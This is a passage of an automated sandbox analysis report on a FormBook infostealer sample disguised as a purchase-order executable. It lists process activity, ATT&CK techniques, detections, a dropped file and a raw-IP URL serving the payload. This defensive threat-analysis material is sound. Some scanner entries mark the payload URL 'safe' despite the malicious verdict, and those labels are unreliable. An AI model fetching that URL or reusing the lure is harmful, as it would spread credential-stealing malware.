      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeCode function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040351C

      Stealing of Sensitive Information

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 0000000E.00000002.3372446801.000000001F9D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 0000000E.00000002.3372446801.000000001F9D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Windows Management Instrumentation      		1
      DLL Side-Loading      		1
      Access Token Manipulation      		11
      Masquerading      		OS Credential Dumping231
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		1
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Shared Modules      		Boot or Logon Initialization Scripts411
      Process Injection      		41
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Process Discovery      		Remote Desktop Protocol1
      Clipboard Data      		1
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts2
      PowerShell      		Logon Script (Windows)1
      DLL Side-Loading      		1
      Access Token Manipulation      		Security Account Manager41
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive1
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook411
      Process Injection      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput Capture11
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Deobfuscate/Decode Files or Information      		LSA Secrets2
      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
      Obfuscated Files or Information      		Cached Domain Credentials124
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      Software Packing      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      DLL Side-Loading      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      PO. A-72 9234567.exe21%ReversingLabsWin32.Trojan.Garf
      PO. A-72 9234567.exe100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\Notanencephalia.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\Notanencephalia.exe21%ReversingLabsWin32.Trojan.Garf

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://212.162.149.89/KSMZNlmay152.bin0%Avira URL Cloudsafe
      http://212.162.149.89/KSMZNlmay152.bin(0%Avira URL Cloudsafe
      http://crl.mi0%Avira URL Cloudsafe
      http://212.162.149.89/KSMZNlmay152.binp0%Avira URL Cloudsafe
      http://212.162.149.89/0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      bg.microsoft.map.fastly.net
      		199.232.214.172
      		truefalse
        		high
        ax-0001.ax-msedge.net
        		150.171.28.10
        		truefalse
          		high

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://212.162.149.89/KSMZNlmay152.binfalse
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.3102158984.000000000624B000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000002.00000002.3099047054.0000000005337000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://g.live.com/odclientsettings/Prod1C:qmgr.db.11.drfalse
                		high
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.3099047054.0000000005337000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3103991276.00000000077F3000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.3099047054.0000000005337000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.3099047054.00000000051E1000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.3099047054.0000000005337000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3103991276.00000000077F3000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://212.162.149.89/KSMZNlmay152.binpNotanencephalia.exe, 0000000E.00000002.3360242550.0000000004098000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.3099047054.0000000005337000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://contoso.com/powershell.exe, 00000002.00000002.3102158984.000000000624B000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.3102158984.000000000624B000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://contoso.com/Licensepowershell.exe, 00000002.00000002.3102158984.000000000624B000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://contoso.com/Iconpowershell.exe, 00000002.00000002.3102158984.000000000624B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 0000000B.00000003.2466483235.0000022D73E50000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.drfalse
                                    		high
                                    http://crl.ver)svchost.exe, 0000000B.00000002.3417307334.0000022D74000000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://212.162.149.89/KSMZNlmay152.bin(Notanencephalia.exe, 0000000E.00000002.3360242550.0000000004098000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://nsis.sf.net/NSIS_ErrorErrorPO. A-72 9234567.exe, Notanencephalia.exe.2.drfalse
                                        		high
                                        http://www.microsoft.cpowershell.exe, 00000002.00000002.3112960418.0000000008A22000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.3099047054.00000000051E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.3099047054.0000000005337000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3103991276.00000000077F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://crl.mipowershell.exe, 00000002.00000002.3103991276.00000000077F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://212.162.149.89/Notanencephalia.exe, 0000000E.00000002.3360242550.00000000040D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              212.162.149.89
                                              		unknownNetherlands
                                              		64236UNREAL-SERVERSUSfalse

                                              Private

                                              IP
                                              127.0.0.1

                                              General Information

                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1572258
                                              Start date and time:2024-12-10 10:31:08 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 7m 24s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:15
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:PO. A-72 9234567.exe
                                              Detection:MAL
                                              Classification:mal100.troj.evad.winEXE@7/17@0/2
                                              EGA Information:
                                              • Successful, ratio: 66.7%
                                              HCA Information:
                                              • Successful, ratio: 93%
                                              • Number of executed functions: 92
                                              • Number of non-executed functions: 308
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe

                                              Warnings

                                              • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                              • Excluded IPs from analysis (whitelisted): 23.218.208.109, 104.121.21.116, 20.190.181.5, 20.103.156.88, 13.107.246.63, 2.16.158.50, 4.175.87.197, 150.171.28.10, 2.16.158.171
                                              • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, e15275.d.akamaiedge.net, tile-service.weather.microsoft.com, tse1.mm.bing.net, ctldl.windowsupdate.com, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com, wildcard.weather.microsoft.com.edgekey.net, login.live.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net
                                              • Execution Graph export aborted for target powershell.exe, PID 5160 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size getting too big, too many NtCreateKey calls found.
                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • VT rate limit hit for: PO. A-72 9234567.exe

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              04:32:05API Interceptor32x Sleep call for process: powershell.exe modified
                                              04:32:34API Interceptor2x Sleep call for process: svchost.exe modified
                                              04:34:01API Interceptor3x Sleep call for process: Notanencephalia.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              No context

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              bg.microsoft.map.fastly.netc2.htaGet hashmaliciousXWormBrowse
                                              • 199.232.210.172
                                              SC3sPWT51E.exeGet hashmaliciousLummaC StealerBrowse
                                              • 199.232.214.172
                                              file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                              • 199.232.214.172
                                              OrderSheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                              • 199.232.210.172
                                              file.exeGet hashmaliciousStealcBrowse
                                              • 199.232.210.172
                                              file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, VidarBrowse
                                              • 199.232.214.172
                                              file.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                                              • 199.232.214.172
                                              lz3EbiqoK4.exeGet hashmaliciousQuasarBrowse
                                              • 199.232.214.172
                                              List of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                              • 199.232.210.172
                                              xMaSQ3Bn10.docxGet hashmaliciousUnknownBrowse
